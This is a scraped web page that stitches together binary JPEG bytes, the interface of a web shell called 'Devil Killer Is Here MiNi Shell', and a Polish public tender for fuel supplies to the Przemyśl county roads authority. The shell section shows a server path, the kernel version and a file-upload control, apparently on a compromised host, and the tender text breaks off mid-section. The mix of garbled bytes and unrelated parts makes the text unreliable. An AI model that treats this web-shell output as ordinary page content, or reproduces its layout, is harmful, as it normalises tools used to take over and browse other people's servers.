JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231207/0053720601-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa (zakup) paliw płynnych dla Zarządu Dróg Powiatowych w <br/>Przemyślu w 2024 roku. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Przemyślu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650945384</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Dominikański, 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przemyśl</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdpprzemysl@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdpp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa (zakup) paliw płynnych dla Zarządu Dróg Powiatowych w <br/>Przemyślu w 2024 roku. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-4dbe9bdb-94db-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00537206</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00052564/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.9 Dostawa (zakup) paliw płynnych dla Zarządu Dróg Powiatowych w Przemyślu w 2024 roku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiat_przemysl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiat_przemysl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca przystępując do<br/>postępowania o udzielenie zamówienia publicznego, tj. bezpłatnie rejestrując się lub logując, w przypadku posiadania konta w<br/>Platformie Zamówień Publicznych, akceptuje warunki korzystania z Platformy, określone w Regulaminie zamieszczonym na stronie<br/>internetowej https://platformazakupowa.pl/pn/powiat_przemysl oraz uznaje go za wiążący.3. Ogólne zasady korzystania z<br/>Platformy:1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>https://platformazakupowa.pl/pn/powiat_przemysl 2) Wykonawca aby przystąpić do postępowania musi założyć konto na Platformie<br/>https: https://platformazakupowa.pl/pn/powiat_przemysl gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia<br/>bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, otrzymuje link<br/>aktywacyjny, a następnie ustanawia hasło.3) Proces rejestracji Wykonawcy jest w pełni automatyczny, po zarejestrowaniu należy<br/>podać dane firmy, którą osoba zakładająca konto reprezentuje.4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w<br/>postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy i powiadomień mailowych.5) Zamawiający, zgodnie z § 3<br/>ROZPORZĄDZENIE PREZESA RADY MINISTRÓWz dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie (dalej jako &#34;Rozporządzenie&#34;) określa niezbędne wymagania sprzętowo -<br/>aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.: a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ,<br/>jeden z systemów operacyjnych - MS Windows 10, Mac Os x 10.4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna<br/>przeglądarka internetowa najlepiej najnowszej dostępnej wersji obsługująca TLS 1.2 z wyjątkiem Internet Explorer,d) włączona<br/>obsługa JavaScript,e) zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf,f) podłączony lub<br/>wbudowany do komputera czytnik karty kryptograficznej wydanej przez wystawcę certyfikatu używanego przez Wykonawcę.6)<br/>Zamawiający, zgodnie z § 3 powołanego powyżej Rozporządzenia określa:a) dopuszczalne formaty przesyłanych danych, tj. plików<br/>o wielkości do 100 MB w formatach: .doc, .pdf, .zip.b) informacje na temat kodowania i czasu odbioru danych: - plik załączony przez<br/>Wykonawcę na Platformie Zamówień Publicznych i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu składania<br/>ofert.c) oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu<br/>platformy, który jest synchronizowany ze znacznikiem czasu UTC.4. Wykonawca powinien dokładnie zapoznać się z niniejszą SWZ i<br/>złożyć ofertę zgodnie z określonymi wymaganiami.5. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane<br/>będą elektronicznie za pośrednictwem dedykowanego formularza udostępnionego na Platformie:<br/>https://platformazakupowa.pl/pn/powiat_przemysl 6. Dokumenty, podmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia muszą być złożone w formie elektronicznej lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem<br/>osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie<br/>rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie oraz składane są przez Wykonawcę za pośrednictwem<br/>Formularza do komunikacji jako załączniki.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że: 2. administratorem Pani/Pana danych osobowych jest Dyrektor<br/>Zarządu Dróg Powiatowych w Przemyślu Plac Dominikański 3 , 37-700 Przemyśl 3. administrator wyznaczył Inspektora Danych<br/>Osobowych : P. mgr Elżbieta Kalita z którym można się kontaktować pod adresem e-mail: zdpprzemysl@op.pl, .tel. 16 675-00-25 4.<br/>Dane osobowe wykonawcy będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego. 5. Odbiorcami przekazanych przez wykonawcę danych osobowych będą<br/>osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania zgodnie z art.74 ustawy Pzp, a także art. 6 ustawy z<br/>6 września 2001 r. o dostępie do informacji publicznej. 6. Dane osobowe wykonawcy zawarte w protokole postępowania będą<br/>przechowywane przez okres 4 lat, od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. 7. Obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P.,<br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego. 8. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO. 9. Posiada Pani/Pan: a) na podstawie art.<br/>15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby<br/>po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników); c) na podstawie art. 18 RODO<br/>prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o<br/>udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej,<br/>lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>11. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych,<br/>ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP.IV.333-1/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest : dostawa ( zakup) paliwa do pojazdów służbowych oraz do <br/>pojemników atestowanych - na potrzeby sprzętu i urządzeń dla Zarządu Dróg Powiatowych w <br/>Przemyślu w roku 2024 w ilościach : benzyna bezołowiowa PB 95 – do 8 000 litrów, olej napędowy <br/>– do 45.000 litrów – w systemie sprzedaży bezgotówkowej.<br/>Zamawiający nie przewiduje zakupu paliw przy użyciu kart paliwowych.<br/>Podane ilości paliw są ilościami szacunkowymi i nie mogą stanowić podstawy <br/>do kierowania przez Wykonawcę roszczeń do Zamawiającego dot. ilości paliw faktycznie <br/>zakupionych przez Zamawiającego. Zamawiający zastrzega sobie prawo ograniczenia <br/>przedmiotu umowy w zakresie ilościowym i asortymentowym – w przypadku gdy <br/>z przyczyn ekonomicznych, bieżących potrzeb lub innych okoliczności nie będzie to leżało <br/>w interesie Zamawiającego. <br/>Zamawiający zastrzega sobie prawo zmian ilościowych dostaw przedmiocie zamówienia z <br/>zastrzeżeniem, iż w wyniku ww. zmian nie zostanie przekroczona wartość umowy. Przy czym <br/>Zamawiający gwarantuje realizację Przedmiotu Umowy na poziomie nie niższym niż 60% <br/>wielkości Przedmiotu zamówienia. W przypadku skorzystania przez Zamawiającego z <br/>uprawnienia, o którym mowa w zdaniu poprzedzającym, Wykonawcy będzie przysługiwało <br/>wynagrodzenie należne mu wyłącznie z tytułu wykonanej części Przedmiotu zamówienia w <br/>zmniejszonym zakresie. Realizacja umowy w pozostałym zakresie uzależniona będzie od <br/>faktycznych potrzeb zamawiającego. Cena określona w umowie stanowi maksymalny limit <br/>finansowy, do którego Zamawiający może realizować umowę. Ostateczna wartość wynagrodzenia <br/>umownego określona będzie na podstawie rzeczywistych ilości dostaw objętych przedmiotowym <br/>postępowaniem. Wykonawcy nie przysługuje prawo dochodzenia wynagrodzenia uzupełniającego <br/>ani zgłaszania roszczeń odszkodowawczych w sytuacji gdy ilość zamówionego przez <br/>Zamawiającego paliw, nie wyczerpuje kwoty maksymalnego wynagrodzenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09134100-8 - Olej napędowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi <br/>kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał <br/>spełnienie kryteriów:<br/>Wybór oferty dokonany zostanie w oparciu o następujące kryteria:<br/>1) Cena – ( łączna cena brutto) – waga kryterium 60 % ( C )<br/>Cena jednostkowa brutto za 1 litr paliwa stanowi średnią cenę pomniejszoną o <br/>proponowany rabat - z dnia ogłoszenia postepowania w BZP tj. 07 grudnia 2023 r. –<br/>obowiązująca na stacji paliw Wykonawcy<br/>2) Stały upust - rabat od ceny detalicznej paliw – waga kryterium 40 % ( Up )<br/>Ad. 1) Oferta w kryterium cena może uzyskać od 0 do 60 punktów, przy czym oferta <br/>z najniższą ceną uzyska 60 pkt. Pozostałym ofertom zostaną wyliczone punkty <br/>wg następującego wzoru:<br/>Wartość punktowa ceny = Rc Cmin/Cn<br/>Rc - ranga kryterium cenowego<br/>Cmin - najniższa cena spośród oferowanych<br/>Cn - cena danej oferty<br/>Ad. 2) Oferta w kryterium rabat ( stały upust ) może uzyskać od 0 do 40 pkt. <br/>Sposób oceny :<br/>Zamawiający w niniejszym kryterium przyzna ofercie Wykonawcy odpowiednią ilość <br/>punktów wynikającą z poniższego zestawienia :<br/>Wysokość upustu Ilość punktów<br/>---------------------------------------------------<br/> 1 grosz 2<br/> 2 grosze 4<br/> 3 grosze 6<br/> 4 grosze 8<br/> 5 groszy 10<br/> 6 groszy 12<br/> 7 groszy 14<br/> 8 groszy 16<br/> 9 groszy 18<br/> 10 groszy 20<br/> 11groszy 22<br/>12 groszy 24<br/>13 groszy 26<br/>14 groszy 28<br/>15 groszy 30<br/>16 groszy 32<br/>17 groszy 34<br/>18 groszy 36<br/>19 groszy 38<br/>20 groszy 40 <br/>Ofertą najkorzystniejszą będzie oferta, która przedstawi najkorzystniejszy bilans ceny <br/>i innych kryteriów odnoszących się do przedmiotu zamówienia uzyskując najwyższą ilość <br/>punktów, wyliczoną wg poniższego wzoru :<br/> P = P(c) + P(up)<br/>P – Łączna ilość punktów, jaką otrzymała oferta<br/>P(c) – ilość punktów, jaka otrzymała oferta w kryterium „cena”<br/>P( up) – ilość punktów, jaka otrzymała oferta w kryterium „rabat”(stały upust<br/>Jeżeli zamawiający nie będzie mógł dokonać wybory oferty najkorzystniejszej ze względu na <br/>to, że zostały złożone oferty, które uzyskały tę samą liczbę punktów ( P ) Zamawiający wezwie <br/>Wykonawców, którzy złożyli te oferty , do złożenia w terminie określonym przez <br/>Zamawiającego ofert dodatkowych. Oferty dodatkowe mogą dotyczyć jedynie kryterium <br/>„cena”. Wykonawcy składając oferty dodatkowe nie mogą zaoferować cen wyższych niż <br/>zaoferowane w złożonych ofertach. Jeżeli nie będzie można wybrać oferty najkorzystniejszej <br/>z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów <br/>oceny ofert – Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną.<br/>2. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert <br/>przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, zamawiający wybiera spośród <br/>tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>3. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybiera <br/>ofertę z najniższą ceną.<br/>2. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 2, zamawiający wzywa <br/>wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego <br/>ofert dodatkowych zawierających nową cenę.<br/>5. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z <br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>6. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących <br/>treści złożonej oferty lub innych składanych dokumentów lub oświadczeń w tym zaoferowanej <br/>ceny.<br/>7.Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za <br/>najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Upust</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/>wykluczeniu na zasadach określonych w pkt. 8 II Rozdziału oraz spełniają na <br/>podstawie art. 112 określone przez Zamawiającego warunki udziału w <br/>postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie <br/>Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający uzna warunek za spełniony jeśli Wykonawca posiada:<br/>aktualna koncesję wydaną przez Urząd Regulacji Energetyki na obrót paliwami ciekłymi<br/>objętymi niniejszym zamówieniem zgodnie z wymogami ustawy z dnia 10 kwietnia<br/>1997r. – Prawo energetyczne (Dz. U. z 2022 r. poz. 1385 z późn. zm.).<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym 